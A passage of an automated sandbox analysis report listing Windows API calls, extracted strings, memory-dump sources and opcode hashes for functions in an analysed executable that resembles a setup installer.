                                                                                            • Opcode Fuzzy Hash: e7ebfea45444ea9c11b2851c030b1c82e81be4d7c359b89fb9621dfee32d1b04
                                                                                            • Instruction Fuzzy Hash: E0318170B00128ABDF11EF9AD841BAEB7B9EB48308F91447BF410A7291D7785D45CA69
                                                                                            APIs
                                                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 00454848
                                                                                            • GetLastError.KERNEL32(0000003C,00000000,00454891,?,?,?), ref: 00454859
                                                                                              • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: DirectoryErrorExecuteLastShellSystem
                                                                                            • String ID: <$SuG
                                                                                            • API String ID: 893404051-1504269210
                                                                                            • Opcode ID: 0173540be8187d3cca920cd9054ca9af2117f56a2c32ed9380eed9ddca2bdfeb
                                                                                            • Instruction ID: e58c708146c2f721f38e64faa2aac8e88425893723770a95bfdd45a03fe75b0c
                                                                                            • Opcode Fuzzy Hash: 0173540be8187d3cca920cd9054ca9af2117f56a2c32ed9380eed9ddca2bdfeb
                                                                                            • Instruction Fuzzy Hash: 7D218574A00249ABDB10EF65C88269E7BE8EF49349F50403AF844EB381D7789D498B98
                                                                                            APIs
                                                                                            • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                                            • ExitProcess.KERNEL32 ref: 00404E0D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExitMessageProcess
                                                                                            • String ID: Error$Runtime error at 00000000
                                                                                            • API String ID: 1220098344-2970929446
                                                                                            • Opcode ID: 65f8ed0532075a2792cd4408a2c9e4abcf3b0691aeac86d53ce49d1bb586f2e2
                                                                                            • Instruction ID: 7c754c0b660761a5bc1c63aadfae0e1dd2c0c13e95eab211716155318e46cc07
                                                                                            • Opcode Fuzzy Hash: 65f8ed0532075a2792cd4408a2c9e4abcf3b0691aeac86d53ce49d1bb586f2e2
                                                                                            • Instruction Fuzzy Hash: E421CB606442514ADB11AB799C857163B9197E534CF04817BE700B73F2CA7D9C64C7EF
                                                                                            APIs
                                                                                              • Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4
                                                                                              • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                              • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                            • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00455E48
                                                                                            • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00455E75
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                                            • String ID: LoadTypeLib$RegisterTypeLib
                                                                                            • API String ID: 1312246647-2435364021
                                                                                            • Opcode ID: ff476844371f4104c378b253a494915691f6bbf47305687bf7563dfe30fd17cc
                                                                                            • Instruction ID: e41936e4c8b07abfc49a8f10cd7ccd4a21eee7bf761b45698a75813e6285fe04
                                                                                            • Opcode Fuzzy Hash: ff476844371f4104c378b253a494915691f6bbf47305687bf7563dfe30fd17cc
                                                                                            • Instruction Fuzzy Hash: 59119631B00A04AFDB11DFA6CD62A5FB7ADEB89705F10847ABC04D3652DB789E04CA54
                                                                                            APIs
                                                                                            • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00456366
                                                                                            • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 00456403
                                                                                            Strings
                                                                                            • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00456392
                                                                                            • Failed to create DebugClientWnd, xrefs: 004563CC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                                            • API String ID: 3850602802-3720027226
                                                                                            • Opcode ID: c69c87a4a610bb2d85408e1b555d6f8d603e272f230d3717a3ecef290dd31cb1
                                                                                            • Instruction ID: 9b4fe9b07e62f64c95e3ed8797323406b80950c852a807cd7dd65319169fa691
                                                                                            • Opcode Fuzzy Hash: c69c87a4a610bb2d85408e1b555d6f8d603e272f230d3717a3ecef290dd31cb1
                                                                                            • Instruction Fuzzy Hash: 1111E3B06042506FD300AB699C81B5F7BA89B56309F45443BF984DF383D3798C18CBAE
                                                                                            APIs
                                                                                              • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                            • GetFocus.USER32 ref: 004771FF
                                                                                            • GetKeyState.USER32(0000007A), ref: 00477211
                                                                                            • WaitMessage.USER32(?,00000000,00477238,?,00000000,0047725F,?,?,00000001,00000000,?,?,?,0047E9E6,00000000,0047F8E7), ref: 0047721B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: FocusMessageStateTextWaitWindow
                                                                                            • String ID: Wnd=$%x
                                                                                            • API String ID: 1381870634-2927251529
                                                                                            • Opcode ID: 4a336d0fab4478f12607185930d67efd8132ed5f698f2504fd14852207cbbe6e
                                                                                            • Instruction ID: 1bcd60996d2698ed373ebf422e897d28d135c5275452f214efeb8338eb806bda
                                                                                            • Opcode Fuzzy Hash: 4a336d0fab4478f12607185930d67efd8132ed5f698f2504fd14852207cbbe6e
                                                                                            • Instruction Fuzzy Hash: A611CA30604204AFC701EFA9DC41ADE77F8EB49704B9184F6F418E3252D73C6D10CA6A
                                                                                            APIs
                                                                                            • FileTimeToLocalFileTime.KERNEL32(000000FF), ref: 0046D640
                                                                                            • FileTimeToSystemTime.KERNEL32(?,?,000000FF), ref: 0046D64F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Time$File$LocalSystem
                                                                                            • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                                            • API String ID: 1748579591-1013271723
                                                                                            • Opcode ID: 52d5e1154cf982ec1ea5d8ce260032eaa3f1648937a562aafe09eebef1c1682c
                                                                                            • Instruction ID: 0ff0b3c23c5ed0256b313d7d525d52e9a24b5728abf6314cf281cf193483f13b
                                                                                            • Opcode Fuzzy Hash: 52d5e1154cf982ec1ea5d8ce260032eaa3f1648937a562aafe09eebef1c1682c
                                                                                            • Instruction Fuzzy Hash: 4311F8A090C3909ED340DF2AC44432BBAE4AB89704F04892EF9D8D6381E779C948DB77
                                                                                            APIs
                                                                                              • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00458BC1,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458AD1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpen
                                                                                            • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                                            • API String ID: 47109696-2631785700
                                                                                            • Opcode ID: 26e598e2510fa9e4a6399a429d897fd92e9f9241c646caba1ec59660a343853d
                                                                                            • Instruction ID: 2bdf3aef2c60deecc2fc1a5dc8a42cc53f0a1f71867dabe890c8ddf4abdcbedd
                                                                                            • Opcode Fuzzy Hash: 26e598e2510fa9e4a6399a429d897fd92e9f9241c646caba1ec59660a343853d
                                                                                            • Instruction Fuzzy Hash: 3AF0A4B17001109BDB10EB1AE845F5B628CDBD1316F20403FF581E7296CE7CDC06CA9A
                                                                                            APIs
                                                                                              • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                            • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00481F79
                                                                                            • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00481F9C
                                                                                            Strings
                                                                                            • CSDVersion, xrefs: 00481F70
                                                                                            • System\CurrentControlSet\Control\Windows, xrefs: 00481F46
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpenQueryValue
                                                                                            • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                                            • API String ID: 3677997916-1910633163
                                                                                            • Opcode ID: 220f1d90dc9d01e70f51e07e52e95aefa24747c0d438b7241eb26c36c3cc7d10
                                                                                            • Instruction ID: c869957850822339a6d2b86bec0dd1f4db8a349efa053aa20552817ac18695c5
                                                                                            • Opcode Fuzzy Hash: 220f1d90dc9d01e70f51e07e52e95aefa24747c0d438b7241eb26c36c3cc7d10
                                                                                            • Instruction Fuzzy Hash: 94F01975E4020DAADF10EAD18C45BAF73BCAB04708F104967FB10E7290E779AA45CB5A
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,004531BA,00000000,0045325D,?,?,00000000,00000000,00000000,00000000,00000000,?,00453529,00000000), ref: 0042D8D6
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D8DC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                                            • API String ID: 1646373207-4063490227
                                                                                            • Opcode ID: 2d19be5e9d3f7a56a1e4775df43ad67afc209c47152956cd3dcb438fc33ecc86
                                                                                            • Instruction ID: 226daeffb333c7fd56417753f7bf411e9e50fb36e69144697282a220664082a3
                                                                                            • Opcode Fuzzy Hash: 2d19be5e9d3f7a56a1e4775df43ad67afc209c47152956cd3dcb438fc33ecc86
                                                                                            • Instruction Fuzzy Hash: 8CE026E0F00B0012D70035BA2C83B6B108D8B88729FA0443F7899F62C7DDBCDAC40AAD
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042E944), ref: 0042E9D6
                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9DC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                            • API String ID: 1646373207-260599015
                                                                                            • Opcode ID: d728472e8339f2ffff8a63abc478e5e6a1fb2f9fde307aaa74d21bec7cd435e2
                                                                                            • Instruction ID: 6bc70aa2ebf4dd36f12f6c88582c327b68e43ec59fad8d4ed568611576548916
                                                                                            • Opcode Fuzzy Hash: d728472e8339f2ffff8a63abc478e5e6a1fb2f9fde307aaa74d21bec7cd435e2
                                                                                            • Instruction Fuzzy Hash: 05D0C7D3351733566D9071FB3CC19AB018C8A116B53540177F500F6141D99DCC4115AD
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00497107,00000001,00000000,0049712B), ref: 00496E36
                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00496E3C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                            • API String ID: 1646373207-834958232
                                                                                            • Opcode ID: d6cd7607be6575f9249c3beb1cc04364ec349a9d743fe925dab93869ddeda9f1
                                                                                            • Instruction ID: 4607b44a290c0083fd8a3bbebdee3b5c85a8181a3f50ff176a2b10a78ee17b7d
                                                                                            • Opcode Fuzzy Hash: d6cd7607be6575f9249c3beb1cc04364ec349a9d743fe925dab93869ddeda9f1
                                                                                            • Instruction Fuzzy Hash: 0BB012CA68170450CC1032F28C07E1F1C0C4C80769B1604373C00F10C3CF6CD800483E
                                                                                            APIs
                                                                                              • Part of subcall function 0044AEAC: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044EFC9,004970B6), ref: 0044AED3
                                                                                              • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044AEEB
                                                                                              • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044AEFD
                                                                                              • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044AF0F
                                                                                              • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044AF21
                                                                                              • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF33
                                                                                              • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF45
                                                                                              • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044AF57
                                                                                              • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044AF69
                                                                                              • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044AF7B
                                                                                              • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044AF8D
                                                                                              • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044AF9F
                                                                                              • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044AFB1
                                                                                              • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044AFC3
                                                                                              • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044AFD5
                                                                                              • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044AFE7
                                                                                              • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044AFF9
                                                                                              • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B00B
                                                                                            • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004970D9), ref: 00463D2B
                                                                                            • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00463D31
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                            • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                            • API String ID: 2238633743-2683653824
                                                                                            • Opcode ID: cec96aa5f796286b6b1f0dc5ec591c4641b52a537a2fc1f69b6a30b1eceec279
                                                                                            • Instruction ID: dcd617acd20af11e442c32675adda2be3f923d80830e775180bb661fb25f4313
                                                                                            • Opcode Fuzzy Hash: cec96aa5f796286b6b1f0dc5ec591c4641b52a537a2fc1f69b6a30b1eceec279
                                                                                            • Instruction Fuzzy Hash: 67B092A0A80780A8DE10BFB3A84390B28248590B1AB20443B30207A093EB7C45145E6F
                                                                                            APIs
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,0047C3E4,?,?,?,?,00000000,0047C539,?,00000000,0000003C,00000000,?,0047C68D), ref: 0047C3C0
                                                                                            • FindClose.KERNEL32(000000FF,0047C3EB,0047C3E4,?,?,?,?,00000000,0047C539,?,00000000,0000003C,00000000,?,0047C68D,00000000), ref: 0047C3DE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFileNext
                                                                                            • String ID:
                                                                                            • API String ID: 2066263336-0
                                                                                            • Opcode ID: c8920c4e496049598e8e4d691bd77c9b57a1904a5ea7081e96ee31db71d01ce9
                                                                                            • Instruction ID: ee88cb3e7f5f0e7034babd07dab097b82f9cbcdb14299ae6248908863b530e43
                                                                                            • Opcode Fuzzy Hash: c8920c4e496049598e8e4d691bd77c9b57a1904a5ea7081e96ee31db71d01ce9
                                                                                            • Instruction Fuzzy Hash: 5981317090025DAFCF11DFA5CC91ADFBBB9EF49304F5084AAE808A7291D7399A46CF54
                                                                                            APIs
                                                                                              • Part of subcall function 0042ECA4: GetTickCount.KERNEL32 ref: 0042ECAA
                                                                                              • Part of subcall function 0042EAFC: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042EB31
                                                                                            • GetLastError.KERNEL32(00000000,004746A1,?,?,0049B178,00000000), ref: 0047458A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CountErrorFileLastMoveTick
                                                                                            • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                                                            • API String ID: 2406187244-2685451598
                                                                                            • Opcode ID: efc54fff5a2ae185733b88f25fecc7f4665324125684443dd4ac39fac187bdd2
                                                                                            • Instruction ID: 473eb97c6ec8267434c8776fb474a14b66813a9beba34573b5150fcc090343b6
                                                                                            • Opcode Fuzzy Hash: efc54fff5a2ae185733b88f25fecc7f4665324125684443dd4ac39fac187bdd2
                                                                                            • Instruction Fuzzy Hash: 79416370A002099FCB10EFA5D882AEE77B4EF89314F518537E504B7395D73C9A05CBA9
                                                                                            APIs
                                                                                            • GetDesktopWindow.USER32 ref: 00413D56
                                                                                            • GetDesktopWindow.USER32 ref: 00413E0E
                                                                                              • Part of subcall function 00418ED0: 6F58C6F0.COMCTL32(?,00000000,00413FD3,00000000,004140E3,?,?,0049A628), ref: 00418EEC
                                                                                              • Part of subcall function 00418ED0: ShowCursor.USER32(00000001,?,00000000,00413FD3,00000000,004140E3,?,?,0049A628), ref: 00418F09
                                                                                            • SetCursor.USER32(00000000,?,?,?,?,00413B03,00000000,00413B16), ref: 00413E4C
                                                                                            Memory Dump Source
